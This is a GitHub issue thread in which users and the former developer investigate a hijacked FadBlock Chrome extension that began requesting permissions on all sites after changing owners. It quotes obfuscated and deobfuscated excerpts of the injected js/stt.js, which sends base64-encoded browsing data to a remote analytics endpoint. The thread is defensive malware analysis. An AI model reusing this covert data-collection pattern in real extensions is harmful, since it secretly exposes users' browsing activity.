Closed JaielZeus closed 4 months ago
+1
+1
Same problem here.
I have no problem enabling the new permissions if they are "necessary", but it is important to know what they are going to be used for.
I can't find information in the README.md or in the GitHub releases.
Thank you
For me, the update also made it so the extension doesn't work and it requires a payment.
Agreed, as long as they're necessary but I also have the license issue, asking for another payment.
I see that several of you are being asked to pay license fees. I clarify that in my case he is not asking me.
What may be different is that I reinstall the extension.
I leave a screenshot.
I also would like to know why the extension now needs more permissions.
I have removed the extension now and gone back to Adblocker as it does the same job and has a reason to have the permission to read data on all sites and is serious enough for me to accept this intrusive permissions
Same. I would like to know why the extension now needs wide open permissions to read and change data on all websites before I re-enable it.
Same. This seems a little fishy. Too bad as it worked well while it worked...
Same thing here on Brave:
This is very worring because last commit (code change) here date of November 2023 ! And latest release on October 2023. I think there is a big suspicious problem this this extension.
My take is: Don't accept theses permissions changes and wait for news from devs here. I just installed the latest available build from github, and it works: https://github.com/0x48piraj/fadblock/releases
This is crazy. I am no longer the owner of the extension. I sold it over a month ago, seems like it traded hands and now the current owner has added malicious code while keeping the extension as it is!
I am taking immediate action and will release a new version of the clean codebase for everyone to use.
I am also thinking of pursuing legal action as it appears they have retained access to my PayPal and other support links!
As of now, I have updated the repository with this new information (https://github.com/0x48piraj/fadblock/commit/4a131670c6cd16bf9844bc50f65a8c6202ffb015) and now will start working on forking and deploying the clean version as soon as possible.
As of now, the clean version has been submitted to the store under a new name.
Now I will start notifying users and trying to control the exposure.
I will also urge you all to report the malicious extension so it can get removed as soon as possible.
I also have filed a report providing the team with support materials,
Any details on what the malicious code is doing?
Yes, being an independent security researcher, this falls under my jurisdiction. I've already started inspecting the code, identified the malicious code block, and am currently conducting an investigation.
Here's the whole source if anyone else is interested, mdadjjfmjhfcibgfhfjbaiiljpllkbfc-v2.7.zip
Here's the details of the malicious file,
File name js/stt.js
File size 249,607 bytes
md5 da0ab10b04e7c069d87b11d99b9ca512
sha1 b4a65d866e9cff6c9517f8a6af6c5a7e3027be88
sha256 5366039a45019653ef1f6bf1b948fdbff3b50fd753096c5ab25f19297fc3e9ba
sha384 090e9629520d85aa4d48a51abffb776083acf85cf138b2849cbd4b7a5ee9e813e8a9e1a80f15ada543e2d2602f591839
sha512 94996e20f3cd61a34e111ab2eca57a3ac9decffdab8a62d1ccbc0aa66bc833e302106716494fb442d80b5de44c1a243dbf65e24dab1b0fc0ac6aa28d49c0b3df
After a cursory analysis, it seems like it's a modified jQuery base coupled with data collection slash adware modules.
The data is sent to the endpoint named fadblock.pro
.
A few manual methods exist to block access to any website domain, such as editing your HOSTS file but for Chrome I would suggest doing the following,
Here's a quick DNS information on fadblock.pro,
Domain: fadblock.pro
Registrar: NameCheap, Inc.
Registered On: 2024-01-21
Expires On: 2025-01-21
Updated On: 2024-01-21
Status:
clientTransferProhibited
addPeriod
Name Servers:
dns1.registrar-servers.com
dns2.registrar-servers.com
Here's a quick DNS information on fadblock.pro,
Domain: fadblock.pro Registrar: NameCheap, Inc. Registered On: 2024-01-21 Expires On: 2025-01-21 Updated On: 2024-01-21 Status: clientTransferProhibited addPeriod Name Servers: dns1.registrar-servers.com dns2.registrar-servers.com
DDoS sequence initiated
I uninstalled the malicious version, but is there anything I should be concerned about in terms of my data? Change passwords on sites etc. that were used?
I don't think the malware could do any of that if you simply didn't accept the permissions, but if you did, it cannot steal passwords, only sessions - that too is not for sure as it mostly had boilerplate nonsense - I am still looking into the code.
It's always a good thing to rotate out passwords every 6 months or so. So, if it's not a hassle, you should do that.
I would notify what the malware strain's capabilities but as of now, I haven't gotten any sleep and have been notifying people who reached out to me one-by-one while pushing out the clean version. So, it may take a day or two.
I don't think the malware could do any of that if you simply didn't accept the permissions, but if you did, it cannot steal passwords, only sessions - that too is not for sure as it mostly had boilerplate nonsense - I am still looking into the code.
It's always a good thing to rotate out passwords every 6 months or so. So, if it's not a hassle, you should do that.
I would notify what the malware strain's capabilities but as of now, I haven't gotten any sleep and have been notifying people who reached out to me one-by-one while pushing out the clean version. So, it may take a day or two.
Thank you @0x48piraj
I haven't gotten any sleep and have been notifying people who reached out to me one-by-one while pushing out the clean version.
Take your sleep, you did most important by alert everybody here, we are sharing the news too. Thanks for that. (I know this kind of rush so I support you...)
Just a question, you said you sold this app to theses guys ? Can you tell more about or is it private ? Just to understand the situation.
I don't think the malware could do any of that if you simply didn't accept the permissions, but if you did, it cannot steal passwords, only sessions - that too is not for sure as it mostly had boilerplate nonsense - I am still looking into the code.
In stealing sessions, what kind of information can be taken from a session? Would that include username/password entered in the session or anything displayed in the browser for that session?
Would that include username/password entered in the session or anything displayed in the browser for that session?
No basically to be sure, just log out every websites your are currently logged in, and theses sessions will be disabled, so unusable. Users data should not be presents in sessions, just tokens for the current ... session.
@benalt613 I don't even think it steals your sessions as of now but it acts as a CnC center of some sort and sends analytical data (probably URLs you visit) to the attacker's server.
Here's the code bit,
if ($('img')) {
$('img')
.each(function(index, value) {
if ($(this)
.attr(gz)) {
let sc = $(this)
.attr(gz);
if (sc.includes(go)) {
chrome.storage.local.get(["fad_yt_block"])
.then((t) => {
t.fad_yt_block && (e = JSON.parse(t.fad_yt_block));
chrome.runtime.sendMessage({
action: "fad-action-src",
url: gi,
pl: {
sc: btoa(sc),
cf: btoa(e)
}
}, function(e) {});
});
}
}
});
}
e && chrome.storage.local.set({
fad_yt_ep: btoa(e + " | " + t)
})
.then(() => {});
})),
v &&
chrome.runtime.sendMessage({
action: "fad-action-text",
url: u
}, function(e) {
const t = /6kU.*?"/gm;
let n;
const r = e;
let u = "";
for (; null !== (n = t.exec(r));)
n.index === t.lastIndex && t.lastIndex++,
n.forEach((e, t) => {
u = e;
});
(u = u.replace('"', "")),
u &&
((u = p + u),
chrome.runtime.sendMessage({
action: "fad-action-json",
url: c + u
}, function(e) {
const t = e.id,
n = e;
chrome.runtime.sendMessage({
action: "fad-action-json",
url: l + u
}, function(e) {
let r = e.data;
chrome.runtime.sendMessage({
action: "fad-action-json",
url: f + u
}, function(e) {
let l = e.data;
chrome.runtime.sendMessage({
action: "fad-action-cf",
url: f1,
c: f2
}, function(e) {
let l1 = e;
chrome.runtime.sendMessage({
action: "fad-action-analytic",
url: o,
pl: {
a: i,
b: u,
c: n,
d: r,
e: l,
f: t,
g: a,
h: s,
i: g,
k: l1
}
}, function(e) {
chrome.storage.local.set({
fad_yt_block: JSON.stringify(t)
})
.then(() => {});
});
});
});
});
}));
So, I think it's not a very nefarious kind of strain (stealing passwords, bank info etc.), it steals your browsing history and probably can perform remote actions (I'm not sure as of now). So, there's that. But it still is a good idea to change your passwords - it can't hurt.
@poka-IT Appreciate your politeness. Unfortunately, I'm bound by a signed agreement that prohibits me from disclosing any information about the owner and the transaction.
And, as I have said above, it's not the buyer, it traded hands again it seems - I have sent a harshly worded email nonetheless.
I'm reading the code you provided, I don't see any malicious code on my side.
External requests are only made on https://fadblock.pro/check/extension
, with just fetching datas, doesn't seems to send anything there.
Response is
{"sstcode":200,"fad1":"https:\/\/play.google.com","fad2":"play.google.com","fad3":"6000","fad4":"videoplayback","fad5":"https:\/\/www.youtube.com\/youtubei\/v1\/notification\/get_unseen_count","fad6":"https:\/\/googleads.g.doubleclick.net\/pagead\/id?v=","fad7":"https:\/\/www.youtube.com\/youtubei\/v1\/player","fad8":"https:\/\/play.google.com\/log?format=json&hasfast=true&authuser=0","fad9":"video-","fad10":"100","fad11":"50","fad12":"https:\/\/jnn-pa.googleapis.com\/$rpc\/google.internal.waa.v1.Waa\/Create"}
So probably just metadata for analytics as you said. Probably loggin IP address, that's it. But i'm just linux sys admin not security expert, maybe missed something.
No, I think you're right @poka-IT. That's my working theory as well.
However, requesting permissions for every site is inherently a malicious action, so it's best to err on the side of extra caution. It has a lot of jQuery boilerplate nonsense and useless base64 encodings.
If they are developing it into a general adblocker - that may grant using the permissions they have but the base64 encoding, cryptic function names, and needless obfuscation, not to mention the tracking - point only to one thing - adware/malware.
So, I think it's not a very nefarious kind of strain (stealing passwords, bank info etc.), it steals your browsing history and probably can perform remote actions (I'm not sure as of now). So, there's that. But it still is a good idea to change your passwords - it can't hurt.
@0x48piraj Thanks. I've also decided to create a separate Chrome profile with limited extensions for sessions containing logins that need to be more secure.
yes, stt.js look like a minified file, but is not as there is line break and indents. A minifier will never do this kind of incremental base64 mapping:
const o = atob(e.fad1),
i = atob(e.fad2),
a = atob(e.fad3),
s = atob(e.fad4),
u = atob(e.fad5),
l = atob(e.fad6),
c = atob(e.fad7),
f = atob(e.fad8),
p = atob(e.fad9),
d = atob(e.fad10),
h = atob(e.fad11),
g = atob(e.fad12),
gn = atob(e.fad13),
go = atob(e.fad14),
gi = atob(e.fad15),
gx = atob(e.fad16),
gy = atob(e.fad17),
gz = atob(e.fad18),
f1 = atob(e.fad19),
f2 = atob(e.fad20);
But a normal human will never code like this, with consts here and 5 lines under, variables with same names but in restrictive scope:
var n = [],
r = Object.getPrototypeOf,
o = n.slice,
i = n.flat
? function (e) {
return n.flat.call(e);
}
: function (e) {
return n.concat.apply([], e);
},
a = n.push,
s = n.indexOf,
u = {},
l = u.toString,
c = u.hasOwnProperty,
f = c.toString,
p = f.call(Object),
d = {},
on 4000 lines ...
LLM don't do that neither, it use human readable names. Unless it has received these instructions. This is machine code, or this is artistic obfuscation. Maybe LLM could help to understand.
Hello @0x48piraj I'm new here and I would just like to ask, does removing the extension from my browser remove potential remote access from their servers or would there still be remnants of their codes embedded that I should be worried about? (sorry for the question I'm still a beginner)
@0x48piraj Is the Firefox version also effected?
The new extension is under review process and hopefully will be released soon and we can shift over there. The funny thing is, I was also affected as I use FadBlock on YT by default lol.
@That1BlueMew, no, the Firefox version is still under my control and thus, it's completely safe.
@SImone-Cow, as of now, the extension doesn't steal data so I think we are safe. Also, yes, just removing the extension will remove everything, no remnants, nothing. Clean slate.
thank you so much that removed my fear i use firefox as my main browser for everything i was about to rotate everything
Thank you so much @poka-IT for collaborating on this. I will finally doze off now as it's been 24 hours since the incident and I don't think I can go on any longer without sleep.
I used this tool to deobfuscate stt.js: https://github.com/ViZiD/humanify
result here: deobfuscated.zip Maybe it help, maybe not.
Now we are on 9000 lines. You're welcome ahaha
Thanks for you hard work and efforts @0x48piraj despite not being the owner of fadblock anymore, you still manage to help us and provide insights regarding the problem.
So the supicious code become:
let ownerDocument = childSeparator(unsupportedSelectors).val();
if (childSeparator("img")) {
childSeparator("img").each(function (index, value) {
if (childSeparator(this).attr(variableGz)) {
let encryptedData = childSeparator(this).attr(variableGz);
if (encryptedData.includes(variableGo)) {
chromeAPI.localStorage.local
.get(["fad_yt_block"])
.then((ownerDocument) => {
if (ownerDocument.youtubeData) {
element = JSONParser.parse(ownerDocument.youtubeData);
}
chromeAPI.runtimeAPI.sendMsg(
{
action: "fad-action-src",
url: variableGi,
pl: {
encryptedData: encodeBase64(encryptedData),
cf: encodeBase64(element),
},
},
function (element) {},
);
});
}
}
});
}
if (element) {
chromeAPI.localStorage.local
.set({
fad_yt_ep: encodeBase64(element + " | " + ownerDocument),
})
.then(() => {});
}
},
);
}
if (returnValue) {
chromeAPI.runtimeAPI.sendMsg(
{
action: "fad-action-text",
url: isXMLDoc,
},
function (element) {
const ownerDocument = /6kU.*?"/gm;
let cache;
const result = element;
let isXMLDoc = "";
for (; (cache = ownerDocument.exec(result)) !== null; ) {
if (cache.index === ownerDocument.lastIndex) {
ownerDocument.lastIndex++;
}
cache.forEach((element, ownerDocument) => {
isXMLDoc = element;
});
}
isXMLDoc = isXMLDoc.replace('"', "");
if (isXMLDoc) {
isXMLDoc = isHTMLDoc + isXMLDoc;
chromeAPI.runtimeAPI.sendMsg(
{
action: "fad-action-json",
url: querySelectorAll + isXMLDoc,
},
function (element) {
const ownerDocument = element.id;
const cache = element;
chromeAPI.runtimeAPI.sendMsg(
{
action: "fad-action-json",
url: document + isXMLDoc,
},
function (element) {
let result = element.data;
chromeAPI.runtimeAPI.sendMsg(
{
action: "fad-action-json",
url: documentElement + isXMLDoc,
},
function (element) {
let document = element.data;
chromeAPI.runtimeAPI.sendMsg(
{
action: "fad-action-cf",
url: variableF1,
querySelectorAll: variableF2,
},
function (element) {
let cfData = element;
chromeAPI.runtimeAPI.sendMsg(
{
action: "fad-action-analytic",
url: divider,
pl: {
length: index,
remainder: isXMLDoc,
querySelectorAll: cache,
support: result,
element: document,
documentElement: ownerDocument,
matches: length,
unsupportedSelectors: matchesSelector,
index: matches,
newResult: cfData,
},
},
function (element) {
chromeAPI.localStorage.local
.set({
youtubeData:
JSONParser.stringify(ownerDocument),
})
.then(() => {});
},
);
},
);
},
);
},
);
Where
variableGz = fad18
variableGo = fad14
variableGi = fad15
The thing is, from https://fadblock.pro/check/extension
, that stop to fad12
, so there is a world where this request return more stuff.
I think the easiest way is to execute this app in sandbox and analyse requests. Or maybe we just don't care.
I think we should do the latter @poka-IT, I couldn't sleep as this incident was eating up my conscience but thanks to the Chrome team, the previous authentic version was just now published!
Share this version wherever you can (and I will do the same): https://chromewebstore.google.com/detail/fadblock-origin-friendly/lmnhcklabcehiohmmeihcheoegomkghm?hl=en
I'm sorry for being direct here but I lost my trust in this extension and moved on to my good old Adblocker. Selling the extension for a quick cash grab and putting the userbase under the bus like that is just so bad. As they say: trust is hard to gain but easy to lose. Wish you good luck for the future of this extension but I'm out though...
You should probably also steer clear of this extension: Adblock for Youtube™. It isn't the Fadblock extension; it is a separate extension which works differently with 10M+ users. It uses the same icon and it also requires invasive permissions for every website.
Thank you @0x48piraj for stepping back in. I supported and paid for Fadblock when you were still the owner and am appreciative for this extension every day. Even more so that you came back and resurrected the original so quickly!
I completely understand, @JaielZeus, in my defense, I thought I took precautions to ensure the buyer wouldn't use it maliciously, but it exchanged hands again. I transferred the extension because I believed it could benefit all users. Maintenance had become challenging, and I envisioned FadBlock evolving into a robust full-blown ChatGPT-powered powerhouse, capable of generating transcripts, language translation, and more, with significant potential…and I didn't have the time to tend to it.
I did all this solely because of the few people who supported this project, whether monetarily or emotionally amid all the negativity, and I couldn't leave you all hanging. This isn't about seeking forgiveness or anything, I just see it as my duty.
This is so bad, first selling us "life time" keys, then selling the software to a unknown third party ??
Are you really sure that this extension does not transfer cookies or users and passwords to the fadblock.pro domain? I'm asking you because a few days ago (January 26th) we had a hack on a Facebook account and I'm almost sure it was caused by this extension with malicious code. No dangerous files were opened on the computer where this extension was installed and coincidentally a few days earlier authorization had been given to read and modify all data on all websites.
@christian100kodehode, in the memo, the licenses were to be retained - which they still are - but I never thought they would try to package the extension into malware.
I have published a new version - replicated the whole database so that lifetime users can log in effortlessly again without any re-payment hassles or even reaching out for troubleshooting.
I am also planning to open-source the current version's codebase and reverse the open-core status. I am very sorry for all the commotion but I never expected any of this. The support was bare-minimum and I wanted to hand it off so it could evolve into something even bigger and better. :/
@fabriziocarloni, I think so, as you can see here on the thread, I and @poka-IT both came to the same conclusion while independently investigating.
@0x48piraj As suggested by @poka-IT the only way to understand what this modified extension really does is to run it in a sandbox and then analyze its requests. I'm sorry but in my opinion it was this extension with malicious code that was the cause of the hack we had.
As said previously, I am in no way saying it's not uploading anything, it was @poka-IT who deep-dived and uncovered the requests, it's better to switch out, and have a security audit of our accounts - I did the same.
The extension was updated over night and now needs more intrusive permissions on chrome to work again. I would like to know the reason why you need that @0x48piraj? I would think reading the data from youtube.com is already enough for this extension to work wouldn't you say so too? What is the reason here? I am really hesitant reenabling it and this suck, especially since I paid for premium and now the extension becomes intrusive like that.